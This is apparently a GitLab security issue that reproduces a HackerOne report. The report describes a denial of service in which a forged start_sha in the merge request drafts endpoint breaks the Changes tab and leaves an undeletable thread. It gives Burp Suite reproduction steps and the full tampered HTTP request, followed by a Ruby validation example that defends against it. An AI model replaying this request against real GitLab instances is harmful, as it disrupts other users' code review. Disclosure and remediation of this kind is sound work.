
Invalid 'start_sha' value in POST `/{group}/{project}/-/merge_requests/{id}/drafts` when commenting on a merge request leaves the Changes tab unable to load

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2058514 by toukakirishima on 2023-07-09, assigned to GitLab Team:


Report

Summary

I found a DoS vulnerability when commenting on a file in a merge request (on the Changes menu). I noticed that if start_sha is not validated first, it causes a DoS (the user can't load the file on the Changes menu and can't delete the thread).

Normally you can delete threads that you have created.

gambar.png

And you can load files on the Changes menu.

gambar.png

But as an attacker I can make the victim unable to load the file on the Changes menu and unable to delete the thread. Even an admin can't delete the thread.

gambar.png

Screenshot_10.png

Let's say Touka Attacker is the attacker and Touka Kirishima is the victim.

gambar.png

And Touka Kirishima (victim) made a merge request.

gambar.png

Steps to reproduce

  1. Go to the merge request.

gambar.png

  2. Go to the Changes menu.

Screenshot_12.png

  3. Comment on a file.

gambar.png

  4. Click "Start a review" and make sure Burp Suite is intercepting. You will see a request like the following. Example:

gambar.png

```http
POST /toukak/aaaa/-/merge_requests/4/drafts HTTP/2
Host: gitlab.com
Cookie: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://gitlab.com/toukak/aaaa/-/merge_requests/4/diffs
X-Csrf-Token: x
X-Requested-With: XMLHttpRequest
Content-Type: application/json
Content-Length: 707
Origin: https://gitlab.com
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"line_type":"old","merge_request_diff_head_sha":"d5d27e5e75cb66f567f39c7fe8ea2daea67f03a9","in_reply_to_discussion_id":"","note_project_id":"","target_type":"merge_request","target_id":235434679,"return_discussion":true,"draft_note":{"note":"Hehe","position":"{\"base_sha\":\"fe0ced6306a3fe0b992d2c4a9204169c1538279f\",\"start_sha\":\"fe0ced6306a3fe0b992d2c4a9204169c1538279f\",\"head_sha\":\"d5d27e5e75cb66f567f39c7fe8ea2daea67f03a9\",\"old_path\":\"hehe\",\"new_path\":\"hehe\",\"position_type\":\"file\",\"old_line\":null,\"new_line\":null,\"line_range\":{},\"ignore_whitespace_change\":false}","noteable_type":"MergeRequest","noteable_id":235434679,"commit_id":null,"type":"DiffNote","line_code":null}}
```

gambar.png

  5. Send it to Repeater.
  6. Change `start_sha`. Example:

```http
POST /toukak/aaaa/-/merge_requests/4/drafts HTTP/2
Host: gitlab.com
Cookie: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://gitlab.com/toukak/aaaa/-/merge_requests/4/diffs
X-Csrf-Token: x
X-Requested-With: XMLHttpRequest
Content-Type: application/json
Content-Length: 707
Origin: https://gitlab.com
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"line_type":"old","merge_request_diff_head_sha":"d5d27e5e75cb66f567f39c7fe8ea2daea67f03a9","in_reply_to_discussion_id":"","note_project_id":"","target_type":"merge_request","target_id":235434679,"return_discussion":true,"draft_note":{"note":"Hehe","position":"{\"base_sha\":\"fe0ced6306a3fe0b992d2c4a9204169c1538279f\",\"start_sha\":\"fe0ced6306a3fe0b992d2c4a9204169c15382791\",\"head_sha\":\"d5d27e5e75cb66f567f39c7fe8ea2daea67f03a9\",\"old_path\":\"hehe\",\"new_path\":\"hehe\",\"position_type\":\"file\",\"old_line\":null,\"new_line\":null,\"line_range\":{},\"ignore_whitespace_change\":false}","noteable_type":"MergeRequest","noteable_id":235434679,"commit_id":null,"type":"DiffNote","line_code":null}}
```

Screenshot_13.png

  7. Click Send.
  8. Finish and submit the review.

gambar.png

  9. Reload the page: you are unable to load the file on the Changes menu and can't delete the thread.

POV from Attacker

gambar.png

Screenshot_14.png

POV from Victim

Screenshot_15.png

Screenshot_16.png

POC

bandicam_2023-07-09_19-04-28-764.mp4

Relevant logs and/or screenshots

```
TypeError: this.discussion.diff_file is null
diffViewerMode diff_with_note.vue:44 VueJS 3 get evaluate Gr isTextFile diff_with_note.vue:56 VueJS 3 get evaluate Gr U diff_with_note.vue:1 VueJS 52 _render r get t mount $mount init d d g d g d g d g d g d Lo _update r get t mount $mount init d d Lo _update r get t mount $mount init d d D E E E E Lo _update r get run mr Cn _n instrument.js:108:32 kt instrument.js:108 VueJS 55 mn gn pn _render r get t mount $mount init d d g d g d g d g d g d Lo _update r get t mount $mount init d d Lo _update r get t mount $mount init d d D E E E E Lo _update r get run mr Cn _n
```

Output of checks

This bug happens on GitLab.com

Impact

  • Attacker can make the victim unable to load the file on the Changes menu.
  • Attacker can make the victim unable to delete the thread. Even an admin can't delete the thread.
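The root cause the report points at is that the `position` JSON inside `draft_note` is persisted without checking that its `start_sha` (and the other refs) belong to the merge request, so a later diff lookup has nothing to resolve and the Changes tab dereferences a null `diff_file`. Below is an added example in Ruby of the server-side check that closes that gap; it is not GitLab's code and not part of the HackerOne report. `KNOWN_DIFF_REFS` is a constructed stand-in for the diff versions a merge request has stored, using the SHAs from the captured requests above; `validate_position`, `check_drafts_request` and the 422 status are hypothetical names and choices for this illustration.

```ruby
# Added example (not GitLab's own code): validate a DiffNote "position"
# from a POST .../merge_requests/:id/drafts body before it is persisted.
require 'json'

# A full 40-hex-digit commit SHA; anything else is rejected up front.
SHA_RE = /\A\h{40}\z/

# Constructed stand-in for the MR's stored diff versions (base/start/head
# triples). Values are the ones from the legitimate request in the report.
KNOWN_DIFF_REFS = [
  { base_sha:  'fe0ced6306a3fe0b992d2c4a9204169c1538279f',
    start_sha: 'fe0ced6306a3fe0b992d2c4a9204169c1538279f',
    head_sha:  'd5d27e5e75cb66f567f39c7fe8ea2daea67f03a9' }
].freeze

class PositionError < StandardError; end

# Parses the position JSON string and returns it as a Hash, or raises
# PositionError when the refs cannot be tied to this merge request.
def validate_position(position_json, known_refs = KNOWN_DIFF_REFS)
  pos = JSON.parse(position_json)
  raise PositionError, 'position must be a JSON object' unless pos.is_a?(Hash)

  shas = pos.values_at('base_sha', 'start_sha', 'head_sha')
  # 1. Shape: every ref must be a well-formed SHA (catches the '...2791'
  #    style edit only if it breaks the format; the next check catches it
  #    when it is well-formed but unknown).
  unless shas.all? { |s| s.is_a?(String) && s.match?(SHA_RE) }
    raise PositionError, 'malformed sha in position'
  end
  # 2. Ownership: the triple must be one of this MR's diff versions, so a
  #    forged start_sha that is not a commit of this MR is refused.
  unless known_refs.any? { |r| r.values_at(:base_sha, :start_sha, :head_sha) == shas }
    raise PositionError, 'position refs do not belong to this merge request'
  end
  # 3. A file/text position needs at least one path to resolve a diff_file.
  if pos['old_path'].to_s.empty? && pos['new_path'].to_s.empty?
    raise PositionError, 'position has no path'
  end
  pos
end

# Mirrors the shape of the drafts endpoint body: draft_note.position is a
# JSON string nested inside the JSON body. Returns [status, message].
def check_drafts_request(body_json, known_refs = KNOWN_DIFF_REFS)
  body = JSON.parse(body_json)
  position_json = body.is_a?(Hash) ? body.dig('draft_note', 'position') : nil
  return [422, 'missing position'] unless position_json.is_a?(String)

  validate_position(position_json, known_refs)
  [200, 'ok']
rescue JSON::ParserError, PositionError => e
  [422, e.message]
end

# Constructed request bodies, built from the values in the report.
LEGIT_START  = 'fe0ced6306a3fe0b992d2c4a9204169c1538279f'
FORGED_START = 'fe0ced6306a3fe0b992d2c4a9204169c15382791' # the tampered value

def drafts_body(start_sha)
  position = {
    base_sha: 'fe0ced6306a3fe0b992d2c4a9204169c1538279f',
    start_sha: start_sha,
    head_sha: 'd5d27e5e75cb66f567f39c7fe8ea2daea67f03a9',
    old_path: 'hehe', new_path: 'hehe', position_type: 'file',
    old_line: nil, new_line: nil, line_range: {}, ignore_whitespace_change: false
  }
  JSON.generate(
    target_type: 'merge_request', target_id: 235434679, return_discussion: true,
    draft_note: { note: 'Hehe', position: JSON.generate(position),
                  noteable_type: 'MergeRequest', noteable_id: 235434679,
                  type: 'DiffNote' }
  )
end

if $PROGRAM_NAME == __FILE__
  puts "legit:  #{check_drafts_request(drafts_body(LEGIT_START)).inspect}"
  puts "forged: #{check_drafts_request(drafts_body(FORGED_START)).inspect}"
end
```

The ownership check is the one that matters for this report: the forged `start_sha` is a syntactically valid SHA, so a format check alone would still let it through; only comparing the triple against the refs the merge request actually has rejects it before a note with an unresolvable position is stored.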

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: